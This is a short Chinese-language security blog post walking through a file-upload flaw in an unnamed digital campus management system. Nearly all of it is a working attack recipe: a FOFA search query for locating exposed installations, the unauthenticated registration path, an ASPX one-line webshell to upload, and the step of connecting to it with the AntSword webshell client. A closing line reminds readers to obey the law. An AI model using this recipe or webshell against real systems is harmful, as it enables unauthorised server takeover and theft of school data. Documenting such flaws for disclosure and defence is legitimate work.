spaceman'blog > 某数字化校园综合管理系统-文件上传getshell

某数字化校园综合管理系统-文件上传getshell

2021-03-18

getshell, 文件上传

# 某数字化校园综合管理系统 - 文件上传 getshell

# 漏洞简介

系统前台企业注册页面存在恶意文件上传漏洞

# 资产查找

FOFA:

1
body="DC_Login/QYSignUp"

# 漏洞复现

点击企业注册

image-20210318114246155

不存在这个链接可直接尝试访问 /DC_Login/QYSignUp 目录

选择上传附件,直接上传 aspx 一句话木马

1
<% @Page Language="Jscript"%><%eval(Request.Item["cmd"],"nice!");%>

image-20210318114616565

成功上传

image-20210318114529726

蚁剑连接

image-20210318114931912

各位白帽子应严格遵守中华人民共和国相关法律法规 。